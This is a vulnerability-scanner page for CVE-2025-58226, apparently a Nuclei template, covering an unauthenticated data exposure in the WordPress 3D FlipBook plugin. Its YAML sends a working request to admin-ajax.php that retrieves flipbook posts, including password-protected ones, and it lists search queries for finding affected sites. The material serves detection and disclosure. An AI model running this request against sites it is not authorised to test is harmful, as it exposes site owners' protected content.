WordPress 3D FlipBook Plugin <= 1.16.17 - Sensitive Information Exposure
CVE-2025-58226
Verified
Description
The 3D FlipBook WordPress plugin (≤ v1.16.17) has a vulnerability where an unauthenticated AJAX action (fb3d_send_posts) exposes sensitive data. Attackers can access all flipbook posts—including password-protected content, metadata, PDF URLs, and plugin settings—without authorization.
Severity
Medium
Published Date
April 23, 2026
Template Author
pussycat0x
CVE-2025-58226.yaml
id: CVE-2025-58226
info:
name: WordPress 3D FlipBook Plugin <= 1.16.17 - Sensitive Information Exposure
author: pussycat0x
severity: medium
description: |
The 3D FlipBook WordPress plugin (≤ v1.16.17) has a vulnerability where an unauthenticated AJAX action (fb3d_send_posts) exposes sensitive data. Attackers can access all flipbook posts—including password-protected content, metadata, PDF URLs, and plugin settings—without authorization.
impact: |
Attackers can retrieve embedded sensitive data, leading to information disclosure.
remediation: Update to the latest version.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/interactive-3d-flipbook-powered-physics-engine/
- https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/...
- https://plugins.svn.wordpress.org/interactive-3d-flipbook-powered-physics-engine/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
fofa-query: body="/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
tags: cve,cve2025,wordpress,wp-plugin,3d-flipbook,exposure,unauth
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=fb3d_send_posts"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"code":'
- '"posts":'
- '"title":'
- '"post_type":"3d-flip-book"'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: json
name: post_titles
part: body
json:
- '.posts[].title'
internal: true
# digest: 4a0a00473045022070c59b98e2673c793eff85e628264960d71038fa3cf7bb2963896545f83c00c6022100d6d3a579f9ea62664e6a8ed61db47c7aa9265a441acfb80cbf96fc1ae346acbb:922c64590222798bb761d5b6d8e729505.0Severity
CVSS Metrics
References
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/interactive-3d-flipbook-powered-physics-engine/https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/...https://plugins.svn.wordpress.org/interactive-3d-flipbook-powered-physics-engine/
Remediation Steps
Update to the latest version.